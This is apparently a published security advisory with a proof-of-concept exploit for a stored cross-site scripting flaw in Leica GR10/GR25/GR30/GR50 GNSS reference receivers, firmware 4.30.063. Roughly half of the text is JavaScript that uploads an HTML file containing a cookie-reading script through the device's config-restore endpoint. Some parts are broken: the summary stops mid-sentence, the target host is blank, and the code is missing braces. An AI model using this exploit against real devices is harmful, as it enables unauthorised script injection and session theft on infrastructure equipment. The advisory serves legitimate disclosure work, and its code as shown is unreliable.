Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection 2019-01-07 19:05:06


Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 JS/HTML Code Injection

Vendor: Leica Geosystems AG
Product web page: https://www.leica-geosystems.com
Affected version: 4.30.063

Summary: The Leica GR10 is the next generation GNSS reference station receiver
that combines the latest state-of-the-art technologies with a streamlined
'plug and play' workflow. Designed for a wide variety of GNSS reference station
applications, the Leica GR10 offers new levels of simplicity, reliability and

Desc: The application suffers from a stored XSS vulnerability. The issue is
triggered via unrestricted file upload while restoring a config file allowing
the attacker to upload an html or javascript file that will be stored in
/settings/poc.html. This can be exploited to execute arbitrary HTML or JS
code in a user's browser session in context of an affected site.

Tested on: BarracudaServer.com (WindowsCE)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2019-5503
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5503.php

Ref: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php



function submitRequest()
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/\/upload_config\/", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryKW8wlraBygxiEQyo");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryKW8wlraBygxiEQyo\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"xss.html\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\n" +
"\x3chtml\x3e\r\n" +
"\x3chead\x3e\r\n" +
"\x3ctitle\x3eHTMLi\x3c/title\x3e\r\n" +
"\x3c/head\x3e\r\n" +
"\x3cbody\x3e\r\n" +
"\x3cscript\x3econfirm(document.cookie)\x3c/script\x3e\r\n" +
"\x3c/body\x3e\r\n" +
"\x3c/html\x3e\n" +
"\n" +
"\r\n" +
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
<form action="#">
<input type="button" value="Init" onclick="submitRequest();" />